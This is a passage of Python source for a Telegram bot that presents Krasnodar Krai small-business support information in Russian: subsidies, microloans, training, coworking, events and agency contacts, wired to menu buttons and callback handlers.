parse_mode=\"HTML\")\n bot.send_message(c.message.chat.id, \"+78619920365\")\n if c.data == \"prom\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nДепартамент промышленной политики Краснодарского края\\n\nАдрес: 350000, г. Краснодар, ул. Красная, д. 176\ndpp@krasnodar.ru\\n\nПоказать на карте\"\"\", parse_mode=\"HTML\")\n bot.send_message(c.message.chat.id, \"+78612517310\")\n if c.data == \"sh\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nМинистерство сельского хозяйства и перерабатывающей промышленности Краснодарского края\\n\nАдрес: г. Краснодар, ул. Рашпилевская, д. 365\nmsh@krasnodar.ru\\n\nПоказать на карте\"\"\", parse_mode=\"HTML\")\n bot.send_message(c.message.chat.id, \"+78612142556\")\n if c.data == \"trud\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nСлужба труда и занятости населения министерства труда и социального развития Краснодарского края\\n\nАдрес: 350000, г. Краснодар, ул. Зиповская, д. 5\nkancel@dgsz.krasnodar.ru\\n\nПоказать на карте\"\"\", parse_mode=\"HTML\")\n bot.send_message(c.message.chat.id, \"+78612571370\")\n if c.data == \"sobit5\":\n key = types.InlineKeyboardMarkup(row_width=1)\n but_1 = types.InlineKeyboardButton(\n text=\"19.05. В Москве пройдет Всемирный Саммит по Криптовалюте и Блокчейну\",\n callback_data=\"sob1\")\n but_2 = types.InlineKeyboardButton(\n text=\"06.06. «Неделя Российского Ритейла 2018» пройдет в Москве\",\n callback_data=\"sob2\")\n but_3 = types.InlineKeyboardButton(text=\"12.04. Конференция «Народные художественные промыслы России» пройдет в Москве\",\n callback_data=\"sob3\")\n but_4 = types.InlineKeyboardButton(\n text=\"18.04. В Москве состоится совещание по вопросам сохранения и развития ремесленной отрасли\",\n callback_data=\"sob4\")\n but_5 = types.InlineKeyboardButton(\n text=\"24.04. Краснодар включен в график проведения Open Innovations Startup Tour Фонда «Сколково»\",\n callback_data=\"sob5\")\n key.add(but_3, but_4, but_5, but_1, but_2)\n bot.send_message(c.message.chat.id, \"Ближайшие 5 событий в бизнесе Кубани\", reply_markup=key)\n if c.data == \"sob1\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\n 19.05. В Москве пройдет Всемирный Саммит по Криптовалюте и Блокчейну\\n\n Перейти к событию\"\"\", parse_mode=\"HTML\")\n if c.data == \"sob2\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\n 06.06. «Неделя Российского Ритейла 2018» пройдет в Москве\\n\n Перейти к событию\"\"\", parse_mode=\"HTML\")\n if c.data == \"sob3\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\n 12.04. Конференция «Народные художественные промыслы России» пройдет в Москве\\n\n Перейти к событию\"\"\", parse_mode=\"HTML\")\n if c.data == \"sob4\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\n 18.04. В Москве состоится совещание по вопросам сохранения и развития ремесленной отрасли\\n\n Перейти к событию\"\"\", parse_mode=\"HTML\")\n if c.data == \"sob5\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\n 24.04. Краснодар включен в график проведения Open Innovations Startup Tour Фонда «Сколково»\\n\n Перейти к событию\"\"\", parse_mode=\"HTML\")\n if c.data == \"sub1\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nСубсидии субъектам деятельности в сфере промышленности при организации трудовой занятости осужденных\\n\nCумма субсидии - до 500 000 руб. Возмещается 60% от фактически произведенных затрат. Получатель – субъект деятельности в сфере промышленности.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"sub2\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nСубсидии субъектам деятельности в сфере промышленности на технологическое присоединение\\n\nСумма субсидии - до 1 800 000 руб. Возмещается 30% от затрат на технологическое присоединение. Получатель – субъект деятельности в сфере промышленности.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"sub3\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nСубсидии на уплату % по кредитам полученным для пополнения оборотных\\n\nСумма субсидии - до 5 000 000 руб. Компенсируются проценты в размере не более 3/4 ключевой ставки Банка России, но не более 70 % от фактически уплаченных процентов. Получатель - субъект деятельности в сфере промышленности.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"sub4\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nСубсидии на уплату % по кредитам и на уплату дохода лизинговых компаний, полученных на создание новых производств, модернизацию и приобретение оборудования\\n\nСумма субсидии - до 10 000 000 руб. По кредитам компенсируются проценты в размере не более 3/4 ключевой ставки Банка России, но не более 70 % от фактически уплаченных процентов. По лизингу компенсируются часть дохода лизинговых компаний, являющихся частью лизинговых платежей, но не более 50% от фактически уплаченных платежей. Получатель-субъект деятельности в сфере промышленности.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"sub5\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nСубсидии на возмещение затрат, связанных с осуществлением образовательной деятельности\\n\nСумма субсидии - до 1 000 000 руб. Возмещается 70 % от фактически произведенных и документально подтвержденных затрат. Получатель - субъект деятельности в сфере промышленности.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"sub5\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nСубсидии на возмещение части затрат на реализацию инвестиционных проектов\\n\nСумма субсидии - до 10 000 000 руб. Компенсируются 10 % от фактически произведенных и документально подтвержденных затрат. Получатель - субъект деятельности в сфере промышленности.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"sh1\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nСельхозстрахование\\n\nВозмещается 50% от затрат.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"sh2\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nПриобретение элитных семян\\n\nСумма субсидии рассчитывается согласно установленной форме.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"sh3\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nПоддержка племенного крупного рогатого скота мясного направления\\n\nСумма субсидии рассчитывается согласно установленной форме.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"sh4\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nСубсидии на развитие садоводства и чаеводства\\n\nСумма субсидии рассчитывается согласно установленной форме.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"sh5\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nДругие субсидии министерства сельского хозяйства и перерабатывающей промышленности Краснодарского края\\n\nОзнакомиться\"\"\", parse_mode=\"HTML\")\n if c.data == \"trud1\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nВозмещение затрат на подготовку документов, представляемых при государственной регистрации\\n\nСумма по факту понесенных затрат, получатель – граждане, признанные в установленном порядке безработными и граждане, признанные в установленном порядке безработными и прошедшие профессиональное обучение или получившие дополнительное профессиональное образование по направлению органов службы занятости.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"trud2\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nВозмещение части затрат на дополнительное рабочее место для трудоустройства безработных граждан\\n\nСумма возмещения – 58 800 рублей, получатель – граждане, признанные в установленном порядке безработными и граждане.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n if c.data == \"trud3\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nЕдиновременная финансовая помощь на открытие индивидуального предпринимателя или юридического лица\\n\nСумма возмещения – 117 600 рублей (зависит от максимального размера пособия по безработице, Постановление от 19.06.2012 года № 710), получатель – граждане, признанные в установленном порядке безработными и граждане, признанные в установленном порядке безработными и прошедшие профессиональное обучение или получившие дополнительное профессиональное образование по направлению органов службы занятости.\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n\n\n@bot.message_handler(commands=[\"start\"])\ndef handle_start(message):\n bot.send_photo(message.from_user.id, photo=\"https://cdn1.savepice.ru/uploads/2018/3/22/2720d857ad2cb63b2995216c4573e92e-full.png\")\n bot.send_message(message.from_user.id, \"www.mbkuban.ru - официальный портал малого бизнеса Кубани\")\n bm.main_menu(bot, message)\n botan.track(constants.botan_key, message.chat.id, message, \"start\")\n\n\n@bot.message_handler(content_types=[\"text\"])\ndef handle_start(message):\n if message.text == \"☎Контакты\":\n bm.cont_menu(bot, message)\n botan.track(constants.botan_key, message.chat.id, message, \"Контакты\")\n if message.text == \"🚀Центр поддержки предпринимательства\":\n bot.send_message(message.from_user.id, \"\"\"\\r\nЦентр поддержки предпринимательства Краснодарского края\\n\nАдрес: 350911, г. Краснодар, ул. Трамвайная, 2/6, 1 этаж\\n\nПоказать на карте\"\"\", parse_mode=\"HTML\")\n bot.send_message(message.from_user.id, \"+78007070711\")\n bot.send_message(message.chat.id, \"Для консультации on-line пишите @CPP_Makeeva\")\n botan.track(constants.botan_key, message.chat.id, message, \"ЦПП_тел\")\n if message.text == \"🚩Иные организации развития бизнеса\":\n key = types.InlineKeyboardMarkup(row_width=1)\n but_1 = types.InlineKeyboardButton(text=\"Департамент инвестиций и развития малого и среднего предпринимательства Краснодарского края\", callback_data=\"invest\")\n but_2 = types.InlineKeyboardButton(text=\"Фонд микрофинансирования Краснодарского края\", callback_data=\"micro\")\n but_3 = types.InlineKeyboardButton(text=\"Гарантийный фонд Краснодарского края\", callback_data=\"garant\")\n but_4 = types.InlineKeyboardButton(text=\"Департамент промышленной политики Краснодарского края\", callback_data=\"prom\")\n but_5 = types.InlineKeyboardButton(text=\"Министерство сельского хозяйства и перерабатывающей промышленности Краснодарского края\", callback_data=\"sh\")\n but_6 = types.InlineKeyboardButton(text=\"Служба труда и занятости населения министерства труда и социального развития Краснодарского края\", callback_data=\"trud\")\n key.add(but_1, but_2, but_3, but_4, but_5, but_6)\n bot.send_message(message.chat.id, \"Полезные контакты организаций и органов развития бизнеса\", reply_markup=key)\n botan.track(constants.botan_key, message.chat.id, message, \"Иныеорг_тел\")\n if message.text == \"🔙 Вернуться в Меню\":\n bm.main_menu(bot, message)\n if message.text == \"💳Финансы\":\n bm.finance_menu(bot, message)\n botan.track(constants.botan_key, message.chat.id, message, \"Финансы\")\n if message.text == \"🔙 Вернуться в 💳Финансы\":\n bm.finance_menu(bot, message)\n if message.text == \"Субсидии\":\n bm.subsid_menu(bot, message)\n botan.track(constants.botan_key, message.chat.id, message, \"Субсидии\")\n if message.text == \"Инновации\":\n bot.send_message(message.chat.id, \"\"\"\\r\nПредоставление субсидии в целях финансового обеспечения (возмещения) части затрат, связанных с созданием и (или) обеспечением деятельности центров молодежного инновационного творчества\\n\nСумма субсидии - до 3 600 000 руб.\nПолучатель – субъекты малого и среднего предпринимательства Краснодарского края\\n\nУсловия поддержки\"\"\", parse_mode=\"HTML\")\n bot.send_message(message.chat.id, \"+78612517599\")\n botan.track(constants.botan_key, message.chat.id, message, \"Инновации\")\n if message.text == \"Микрозаймы и кредитование\":\n bm.mfo_menu(bot, message)\n botan.track(constants.botan_key, message.chat.id, message, \"Микрозаймы и кредиты\")\n if message.text == \"Старт\":\n bot.send_photo(message.from_user.id, photo=\"https://photos.app.goo.gl/SWWuLwYzRwDXejBE2\")\n keyboard = types.InlineKeyboardMarkup()\n url_button = types.InlineKeyboardButton(text=\"Узнать подробнее\", url=\"http://fmkk.ru/types/start/\")\n keyboard.add(url_button)\n bot.send_message(message.chat.id, \"Микрозайм для начинающих субъектов малого и среднего предпринимательства\", reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для консультации on-line напишите @RAGoncharov\")\n botan.track(constants.botan_key, message.chat.id, message, \"Старт\")\n if message.text == \"Фермер\":\n bot.send_photo(message.from_user.id, photo=\"https://photos.app.goo.gl/U2wgWWIPjeTjwdxb2\")\n keyboard = types.InlineKeyboardMarkup()\n url_button = types.InlineKeyboardButton(text=\"Узнать подробнее\", url=\"http://fmkk.ru/types/fermer/\")\n keyboard.add(url_button)\n bot.send_message(message.chat.id, \"Микрозайм для действующих субъектов малого и среднего предпринимательства, организаций инфраструктуры поддержки малого и среднего предпринимательства\", reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для консультации on-line напишите @RAGoncharov\")\n botan.track(constants.botan_key, message.chat.id, message, \"Фермер\")\n if message.text == \"Бизнес-оборот\":\n bot.send_photo(message.from_user.id, photo=\"https://photos.app.goo.gl/cIoyHDGBVY914YRE2\")\n keyboard = types.InlineKeyboardMarkup()\n url_button = types.InlineKeyboardButton(text=\"Узнать подробнее\", url=\"http://fmkk.ru/types/biznes_oborot/\")\n keyboard.add(url_button)\n bot.send_message(message.chat.id, \"Микрозайм для действующих субъектов малого и среднего предпринимательства, организаций инфраструктуры поддержки малого и среднего предпринимательства на пополнение оборотных средств\", reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для консультации on-line напишите @RAGoncharov\")\n botan.track(constants.botan_key, message.chat.id, message, \"Биз-оборот\")\n if message.text == \"Ремесленник\":\n bot.send_photo(message.from_user.id, photo=\"https://photos.app.goo.gl/kRFKZ6RRyw3VYjVC2\")\n keyboard = types.InlineKeyboardMarkup()\n url_button = types.InlineKeyboardButton(text=\"Узнать подробнее\", url=\"http://fmkk.ru/types/remeslennik/\")\n keyboard.add(url_button)\n bot.send_message(message.chat.id, \"Микрозайм для действующих субъектов малого и среднего предпринимательства, организаций инфраструктуры поддержки малого и среднего предпринимательства\", reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для консультации on-line напишите @RAGoncharov\")\n botan.track(constants.botan_key, message.chat.id, message, \"Ремесленник\")\n if message.text == \"Бизнес-инвест\":\n bot.send_photo(message.from_user.id, photo=\"https://photos.app.goo.gl/3WL9HJn3HcbW8Fjr2\")\n keyboard = types.InlineKeyboardMarkup()\n url_button = types.InlineKeyboardButton(text=\"Узнать подробнее\", url=\"http://fmkk.ru/types/biznes_invest/\")\n keyboard.add(url_button)\n bot.send_message(message.chat.id, \"Микрозайм для действующих субъектов малого и среднего предпринимательства, организаций инфраструктуры поддержки малого и среднего предпринимательства на инвестиционные цели\", reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для консультации on-line напишите @RAGoncharov\")\n botan.track(constants.botan_key, message.chat.id, message, \"Биз-инвест\")\n if message.text == \"Новотех\":\n bot.send_photo(message.from_user.id, photo=\"https://photos.app.goo.gl/sUY6BDdTPG7l4wPI3\")\n keyboard = types.InlineKeyboardMarkup()\n url_button = types.InlineKeyboardButton(text=\"Узнать подробнее\", url=\"http://fmkk.ru/types/novotekh/\")\n keyboard.add(url_button)\n bot.send_message(message.chat.id, \"Микрозайм для действующих субъектов малого и среднего предпринимательства, организаций инфраструктуры поддержки малого и среднего предпринимательства на цели приобретения новых основных средств под их залог\", reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для консультации on-line напишите @RAGoncharov\")\n botan.track(constants.botan_key, message.chat.id, message, \"Новотех\")\n if message.text == \"Развитие и инновации\":\n bot.send_photo(message.from_user.id, photo=\"https://photos.app.goo.gl/0rjdE8954a00gfgq2\")\n keyboard = types.InlineKeyboardMarkup()\n url_button = types.InlineKeyboardButton(text=\"Узнать подробнее\", url=\"http://fmkk.ru/types/razvitie_i_innovatsii/\")\n keyboard.add(url_button)\n bot.send_message(message.chat.id, \"Микрозайм для действующих субъектов малого и среднего предпринимательства, организаций инфраструктуры поддержки малого и среднего предпринимательства\", reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для консультации on-line напишите @RAGoncharov\")\n botan.track(constants.botan_key, message.chat.id, message, \"разв и инновации\")\n if message.text == \"Поручительства\":\n bot.send_photo(message.from_user.id, photo=\"https://photos.app.goo.gl/l5zfkQ1FILKQoTCA2\")\n keyboard = types.InlineKeyboardMarkup(row_width=2)\n url_button1 = types.InlineKeyboardButton(text=\"Узнать подробнее\", url=\"http://www.mbkuban.ru/financial-support/surety/\")\n url_button2 = types.InlineKeyboardButton(text=\"Условия (101.33кБ)\",\n url=\"http://www.mbkuban.ru/upload/iblock/a16/a161d37b98b02959bbb405d4e7cffeff.docx\")\n keyboard.add(url_button1, url_button2)\n bot.send_message(message.chat.id, \"Привлечение поручительства в случае нехватки залоговой базы. Максимальная сумма поручительства 25 млн. рублей (не > 70% от суммы займа или банковской гарантии)\", reply_markup=keyboard)\n botan.track(constants.botan_key, message.chat.id, message, \"Поручительства\")\n if message.text == \"✴Услуги\":\n bm.uslugi_menu(bot, message)\n botan.track(constants.botan_key, message.chat.id, message, \"Услуги\")\n if message.text == \"Разработка бизнес-планов\":\n keyboard = types.InlineKeyboardMarkup(row_width=2)\n url_button1 = types.InlineKeyboardButton(text=\"Узнать подробнее\",\n url=\"http://mbkuban.ru/cpp/services/\")\n keyboard.add(url_button1)\n bot.send_message(message.chat.id,\n \"Бизнес план – это документ, дающий развернутое обоснование проекта и возможность всесторонне оценить эффективность принятых решений, планируемых мероприятий, ответить на вопрос, стоит ли вкладывать деньги в данный проект.\",\n reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для записи on-line напишите @CPP_Makeeva\")\n botan.track(constants.botan_key, message.chat.id, message, \"Разраб.биз.планов\")\n if message.text == \"Разработка веб-сайтов\":\n keyboard = types.InlineKeyboardMarkup(row_width=2)\n url_button1 = types.InlineKeyboardButton(text=\"Узнать подробнее\",\n url=\"http://mbkuban.ru/cpp/services/\")\n keyboard.add(url_button1)\n bot.send_message(message.chat.id,\n \"Разработка сайтов – важный элемент современного бизнеса. Сайт – это отличная возможность увеличения продаж и клиентской базы. Современный рынок диктует свои правила и сейчас для любой организации, которая хочет добиться успеха в своей нише, очень важно иметь собственный веб-ресурс.\",\n reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для записи on-line напишите @CPP_Makeeva\")\n botan.track(constants.botan_key, message.chat.id, message, \"Разр.биз.планов\")\n if message.text == \"Создание фирменного стиля\":\n keyboard = types.InlineKeyboardMarkup(row_width=2)\n url_button1 = types.InlineKeyboardButton(text=\"Узнать подробнее\",\n url=\"http://mbkuban.ru/cpp/services/\")\n keyboard.add(url_button1)\n bot.send_message(message.chat.id,\n \"Фирменный стиль – фирменный стиль помогает потребителю быстрее и проще распознавать и запоминать бренд в условиях высокой конкуренции.\",\n reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для записи on-line напишите @CPP_Makeeva\")\n botan.track(constants.botan_key, message.chat.id, message, \"Фир.стиль\")\n if message.text == \"Маркетинговые исследования\":\n keyboard = types.InlineKeyboardMarkup(row_width=2)\n url_button1 = types.InlineKeyboardButton(text=\"Узнать подробнее\",\n url=\"http://mbkuban.ru/cpp/services/\")\n keyboard.add(url_button1)\n bot.send_message(message.chat.id,\n \"Маркетинговые исследования – это систематический сбор, документирование и анализ данных по разным аспектам маркетинговой деятельности. Цель маркетингового исследования — создать информационно-аналитическую базу для принятия управленческих решений.\",\n reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для записи on-line напишите @CPP_Makeeva\")\n botan.track(constants.botan_key, message.chat.id, message, \"Маркет.исследование\")\n if message.text == \"Консультации\":\n keyboard = types.InlineKeyboardMarkup(row_width=2)\n url_button1 = types.InlineKeyboardButton(text=\"Узнать подробнее\",\n url=\"http://www.mbkuban.ru/cpp/consultations/\")\n keyboard.add(url_button1)\n bot.send_message(message.chat.id,\n \"Консультационные услуги по различным вопросам\",\n reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Для записи on-line напишите @CPP_Makeeva\")\n botan.track(constants.botan_key, message.chat.id, message, \"Консультации\")\n if message.text == \"Иные услуги\":\n bot.send_message(message.chat.id, \"Если у Вас есть вопросы, то напишите нам @CPP_Makeeva\")\n botan.track(constants.botan_key, message.chat.id, message, \"Иные услуги\")\n if message.text == \"🎓Обучение\":\n bm.grad_menu(bot, message)\n botan.track(constants.botan_key, message.chat.id, message, \"Обучение\")\n if message.text == \"Семинары центра поддержки\":\n bot.send_photo(message.from_user.id, photo=\"http://kuban24.tv/media/cache/item/res/images/07122017/282696.jpg\")\n keyboard = types.InlineKeyboardMarkup()\n url_button = types.InlineKeyboardButton(text=\"Узнать подробнее\", url=\"http://mbkuban.ru/cpp/events/\")\n keyboard.add(url_button)\n bot.send_message(message.chat.id,\n \"В 2017 году ЦПП провело более 180 семинаров, тренингов, мастер-классов и иных бесплатных образовательных мероприятий.\",\n reply_markup=keyboard)\n botan.track(constants.botan_key, message.chat.id, message, \"Семинары ЦПП\")\n if message.text == \"Школа молодого предпринимателя\":\n bot.send_photo(message.from_user.id, photo=\"https://photos.app.goo.gl/fJLaG8rpCpW2Yuhj2\")\n bot.send_message(message.chat.id,\n \"В Краснодаре на постоянной основе проходит Школа молодого предпринимателя. Образовательная программа сочетает в себе основы теории и практики ведения бизнеса.\")\n bot.send_message(message.chat.id, \"Написать куратору проекта @Silchenko_Kris\")\n botan.track(constants.botan_key, message.chat.id, message, \"ШМП\")\n if message.text == \"«Бизнес класс»\":\n bot.send_photo(message.from_user.id, photo=\"https://photos.app.goo.gl/geJf0pZCe2Hp8GVb2\")\n keyboard = types.InlineKeyboardMarkup(row_width=2)\n url_button1 = types.InlineKeyboardButton(text=\"Регистрация в проекте\",\n url=\"https://www.business-class.pro/\")\n keyboard.add(url_button1)\n bot.send_message(message.chat.id,\n \"Один из самых успешных проектов по повышению предпринимательских навыков – «Бизнес класс», реализуемый ПАО «Сбербанк» и Google\",\n reply_markup=keyboard)\n botan.track(constants.botan_key, message.chat.id, message, \"Биз.класс\")\n if message.text == \"🏢Коворкинг\":\n bot.send_photo(message.from_user.id, photo=\"https://photos.app.goo.gl/4rz7GGEDOtpqFAgV2\")\n keyboard = types.InlineKeyboardMarkup(row_width=1)\n url_button1 = types.InlineKeyboardButton(text=\"Больше фото\",\n url=\"https://drive.google.com/open?id=1mKRj6L16YcGlesnr7deHNOJBRy4kq0U8\")\n url_button2 = types.InlineKeyboardButton(text=\"Больше информация на www.mbkuban.ru\",\n url=\"www.mbkuban.ru/cowork\")\n url_button3 = types.InlineKeyboardButton(text=\"Наш аккаунт Instagram\",\n url=\"www.instagram.com/mdcoworking\")\n url_button4 = types.InlineKeyboardButton(text=\"Наш аккаунт ВКонтакте\",\n url=\"www.vk.com/mdcoworking\")\n url_button5 = types.InlineKeyboardButton(text=\"Наш аккаунт Facebook\",\n url=\"www.facebook.com/mdcoworking\")\n keyboard.add(url_button1, url_button2, url_button3, url_button4, url_button5)\n bot.send_message(message.chat.id,\n \"Государственный коворкинг для предпринимателей «Место действия». Пространство для развития вашего стартапа. Консультации специалистов по вашему бизнесу, бухгалтерское и юридическое сопровождение и мудрые наставники!\",\n reply_markup=keyboard)\n bot.send_message(message.chat.id, \"Написать администратору @Burakov_Sergey\")\n botan.track(constants.botan_key, message.chat.id, message, \"Коворкинг\")\n if message.text == \"📅События\":\n keyboard = types.InlineKeyboardMarkup(row_width=1)\n but_2 = types.InlineKeyboardButton(text=\"Ближайшие 5 событий\", callback_data=\"sobit5\")\n keyboard.add(but_2)\n bot.send_message(message.chat.id, \"Будьте в курсе основных событий в бизнесе Кубани! Подпишитесь на наш канал и узнайте о ближайщих событиях в крае\", reply_markup=keyboard)\n botan.track(constants.botan_key, message.chat.id, message, \"События\")\n if message.text == \"📦Пакеты услуг\":\n bm.paketi_menu(bot, message)\n botan.track(constants.botan_key, message.chat.id, message, \"Пакеты\")\n if message.text == \"🚀Открывай\":\n bot.send_message(message.chat.id, \"\"\"\\r\nОТКРЫВАЙ\nВозможность открыть бизнес легко и без ошибок\\n\nКонсультации: \nпо вопросам регистрации в качестве индивидуального предпринимателя\nпо вопросам выбора формы собственности и системы налогообложения\nпо постановке управленческого учета и др.\nпо составлению бухгалтерской и налоговой отчетности\nпо действующим налоговым льготам\nпо возможностям портала Бизнес-Навигатор МСП\nпо действующим программам субсидирования предпринимателей. \\n\nУслуги: \nпо разработке бизнес-планов\nпо разработке или модернизации веб сайтов\nпо созданию фирменного стиля\\n\nОбучение: \nобразовательный проект «Школа молодого предпринимателя»\nобучающие мероприятия Центра поддержки предпринимательства\\n\nФинансовая поддержка: \nпредоставление микрозаймов до 700 тыс.руб. под 5,75% годовых на срок до 2 лет\\n\nИмущественная поддержка:\nпредоставление оборудованных офисных помещений в коворкинг центре «Место действия»\nпредоставление на льготных условиях помещений бизнес-инкубатора (г. Кропоткин). \\n\"\"\", parse_mode=\"HTML\")\n bot.send_message(message.chat.id, \"\"\"\\rУзнайте подробнее\"\"\", parse_mode=\"HTML\")\n bot.send_message(message.chat.id, \"+78007070711\")\n botan.track(constants.botan_key, message.chat.id, message, \"Открывай\")\n if message.text == \"📊Развивай\":\n bot.send_message(message.chat.id, \"\"\"\\r\nРАЗВИВАЙ \nИнструментарий развития действующего бизнеса \\n\nKонсультации:\nпо вопросам финансового планирования\nпо вопросам юридического сопровождения деятельности\nнаправленные на повышение доступности для малых и средних кредитных и иных финансовых ресурсов\nпо вопросам маркетингового сопровождения деятельности\nпо патентно-лицензионному сопровождению деятельности\nпо организации сертификации товаров, работ и услуг\nпо информационному сопровождению деятельности\nпо действующим программам субсидирования предпринимателей в сфере сельского хозяйства, промышленности, инноваций, занятости населения\\n\nУслуги:\nпо разработке бизнес-планов\nпо разработке или модернизации веб сайтов\nпо созданию фирменного стиля\nпо проведению маркетингового исследованию\nпо регистрации товарного знака\nпо анализу потенциала компании\\n\nОбучение:\nобразовательный проект «Школа молодого предпринимателя»\nсеминары, бизнес-тренинги, круглые столы, конференции Центра поддержки предпринимательства\nпрограмма Корпорации МСП «Азбука предпринимательства» \\n\nФинансовая поддержка:\nпредоставление микрозаймов до 3 млн. руб. под 7,75% годовых на срок до 3 лет\nпоручительства по кредитам, займам и банковским гарантиям до 70% от суммы кредита, но не более 25 млн. руб.\nсубсидии\\n\nИмущественная поддержка:\nпредоставление оборудованных офисных помещений в коворкинг центре «Место действия»\nконсультирование по вопросам предоставления муниципального имущества\nпредоставление на льготных условиях помещений бизнес-инкубатора (г. Кропоткин)\\n\"\"\", parse_mode=\"HTML\")\n bot.send_message(message.chat.id, \"\"\"\\rУзнайте подробнее\"\"\", parse_mode=\"HTML\")\n bot.send_message(message.chat.id, \"+78007070711\")\n botan.track(constants.botan_key, message.chat.id, message, \"Развивай\")\n if message.text == \"✅Производи\":\n bot.send_message(message.chat.id, \"\"\"\\r\nПРОИЗВОДИ \nПриоритетная поддержка для производственных компаний \\n\n\nКонсультации:\nпо повышению эффективности действующего производства\nпо действующим программам субсидирования предпринимателей в сфере сельского хозяйства, промышленности, инноваций, занятости населения\\n\nУслуги:\nпо разработке бизнес-планов\nпо разработке или модернизации веб сайтов\nпо созданию фирменного стиля\nпо проведению маркетингового исследованию\nпо регистрации товарного знака\nпо анализу потенциала компании\nпо модернизации технического перевооружения производства\\n\nОбучение:\nпо программе «Проектный подход к управлению бизнесом»\nсеминары, бизнес-тренинги, круглые столы, конференции Центра поддержки предпринимательства\\n\nФинансовая поддержка:\nпредоставление микрозаймов до 3 млн. руб. под 7,75% годовых на срок до 3 лет\nпоручительства по кредитам, займам и банковским гарантиям до 70% от суммы кредита, но не более 25 млн. руб.\nразработка проектной документации и образцов, модернизация существующего оборудования на условиях софинансирования\nпредоставление налоговых льгот промышленным инвесторам в рамках специальных инвестиционный контрактов\nсубсидии\\n\nИмущественная поддержка:\nпредоставление оборудованных офисных помещений в коворкинг центре «Место действия»\nконсультирование по вопросам предоставления муниципального имущества\\n\"\"\", parse_mode=\"HTML\")\n bot.send_message(message.chat.id, \"\"\"\\rУзнайте подробнее\"\"\", parse_mode=\"HTML\")\n bot.send_message(message.chat.id, \"+78007070711\")\n botan.track(constants.botan_key, message.chat.id, message, \"Производи\")\n if message.text == \"🚚Экспортируй\":\n bot.send_message(message.chat.id, \"\"\"\\r\nЭКСПОРТИРУЙ \nПоддержка экспортоориентированного бизнеса \\n\n\nKонсультации:\nпо тематике ведения внешнеэкономической деятельности\\n\nОбучение:\nсеминары, бизнес-тренинги, круглые столы, конференции Центра поддержки экспорта;\nпо образовательной программе РЭЦ «Жизненный цикл экспортных проектов» \\n\nЭкспортная поддержка:\nучастие в международных бизнес-миссиях;\nучастие в международных выставках за рубежом и на территории Российской Федерации;\nподготовка и перевод на иностранные языки презентационных материалов;\nпроведение B2B-переговоров с иностранными партнерами;\nсоздание и (или) модернизация сайта, в том числе на иностранном языке\\n\"\"\", parse_mode=\"HTML\")\n bot.send_message(message.chat.id, \"\"\"\\rУзнайте подробнее\"\"\", parse_mode=\"HTML\")\n bot.send_message(message.chat.id, \"+78007070711\")\n botan.track(constants.botan_key, message.chat.id, message, \"Экспортируй\")\n if message.text == \"Промышленность\":\n key = types.InlineKeyboardMarkup(row_width=1)\n but_1 = types.InlineKeyboardButton(text=\"При организации трудовой занятости осужденных\", callback_data=\"sub1\")\n but_2 = types.InlineKeyboardButton(text=\"На технологическое присоединение \", callback_data=\"sub2\")\n but_3 = types.InlineKeyboardButton(text=\"На уплату % по кредитам полученным для пополнения оборотных средств\", callback_data=\"sub3\")\n but_4 = types.InlineKeyboardButton(text=\"На уплату % по кредитам и на уплату дохода лизинговых компаний\", callback_data=\"sub4\")\n but_5 = types.InlineKeyboardButton(text=\"На возмещение затрат, связанных с осуществ.образоват.деятельности\", callback_data=\"sub5\")\n but_6 = types.InlineKeyboardButton(text=\"На возмещение части затрат на реализацию инвестиционных проектов\", callback_data=\"sub6\")\n but_7 = types.InlineKeyboardButton(text=\"Контакты\", callback_data=\"prom\")\n key.add(but_1, but_2, but_3, but_4, but_5, but_6, but_7)\n bot.send_message(message.chat.id, \"Субсидии департамента промышленной политики Краснодарского края\", reply_markup=key)\n botan.track(constants.botan_key, message.chat.id, message, \"Суб.деп.промышл.\")\n if message.text == \"Сельское хозяйство\":\n key = 